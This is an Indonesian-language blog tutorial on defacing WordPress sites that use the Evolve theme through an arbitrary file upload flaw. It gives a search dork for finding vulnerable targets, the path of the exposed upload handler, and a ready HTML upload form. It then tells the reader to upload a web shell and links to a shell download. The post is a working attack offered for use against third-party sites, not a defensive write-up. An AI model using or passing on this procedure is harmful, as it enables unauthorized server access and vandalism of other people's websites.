Deface Exploit Wordpress Evolve Arbitrary File Upload Vulnerability

Deface Exploit Wordpress Evolve Arbitrary File Upload Vulnerability

Edit

Cara Deface Exploit Wordpress Evolve Arbitrary File Upload Vulnerability


Hallow semua
Ketemu lagi dengan saya, kali saya akan memberi tutorial deface, sesuai judul di atas, langsung aja

Author : Indonesian Cyber Freedom

Dork : inurl:/wp-content/themes/evolve/js/ ( Bisa ente kembangkan lagi )

Exploit : /wp-content/themes/evolve/js/back-end/libraries/fileuploader/upload_handler.php

Code CSRF :
<form enctype="multipart/form-data"
action="target.com/wp-content/themes/evolve/js/back-end/libraries/fileuploader/upload_handler.php" method="post">
Your File: <input name="qqfile" type="file" /><br />
<input type="submit" value="upload" />
</form>

 Cari target dengan menggunakan dork

klau vuln muncul seperti gambar seperti di bawah ini :


Buka code CSRF nya :



Buka CSRF tadi di browser ente, upload shell, klau berhasil akan seperti ini :


Shell access : http://site.com/wp-content/uploads/years/month/shell.php

Klau ada yg blom pnya shell, bisa download di sini
Download Priv8 Shania Shell

Sekian dan terima kasih =)

Source :
Visit our forum
Share on Google Plus

About Unknown

This is a short description in the author block about the author. You edit it by entering text in the "Biographical Info" field in the user admin panel.
    Blogger Comment
    Facebook Comment

0 comments:

Post a Comment

luvne.com resepkuekeringku.com desainrumahnya.com yayasanbabysitterku.com
Subscribe to: Post Comments ( Atom )